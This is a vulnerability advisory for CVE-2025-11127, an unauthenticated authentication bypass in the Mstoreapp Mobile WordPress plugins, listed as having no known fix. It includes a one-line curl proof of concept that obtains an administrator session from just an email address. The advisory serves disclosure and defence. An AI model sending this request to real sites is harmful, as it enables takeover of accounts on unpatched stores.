Mstoreapp Mobile (App <= 2.08, Multivendor <= 9.0.1) – Unauthenticated Privilege Escalation | CVE 2025-11127

Description

The plugins do not properly verify users identify when using an AJAX action, allowing unauthenticated users to retrieve a valid session for arbitrary users by knowing their email address.

Proof of Concept

curl -X POST "http://example.com/wp-admin/admin-ajax.php?action=mstoreapp-google_connect" \
     -d "access_token=dummy&email=admin@example.com"

Affects Plugins

mstoreapp-mobile-app

No known fix

woo-mstoreapp-mobile-app

No known fix

References

CVE

CVE-2025-11127

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-287

CVSS

9.8 (critical)

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

6432bd1a-6e44-4a3f-890b-df2bd877d626

Timeline

Publicly Published

2025-10-31 (about 2 months ago)

Added

2025-10-31 (about 2 months ago)

Last Updated

2025-10-31 (about 2 months ago)

Other

Published

Title

Published

2015-03-03

Title

Google Captcha <= 1.12 - Authentication Bypass

Published

2022-08-09

Title

Simple Single Sign On <= 4.1.0 - Authentication Bypass

Published

2022-06-20

Title

WP OAuth Server ( Login with WordPress ) < 4.0.1 - Authentication Bypass

Published

2016-06-21

Title

WordPress 4.5.2 - Password Change via Stolen Cookie

Published

2025-06-02

Title

Golo < 1.7.1 - Authentication Bypass to Account Takeover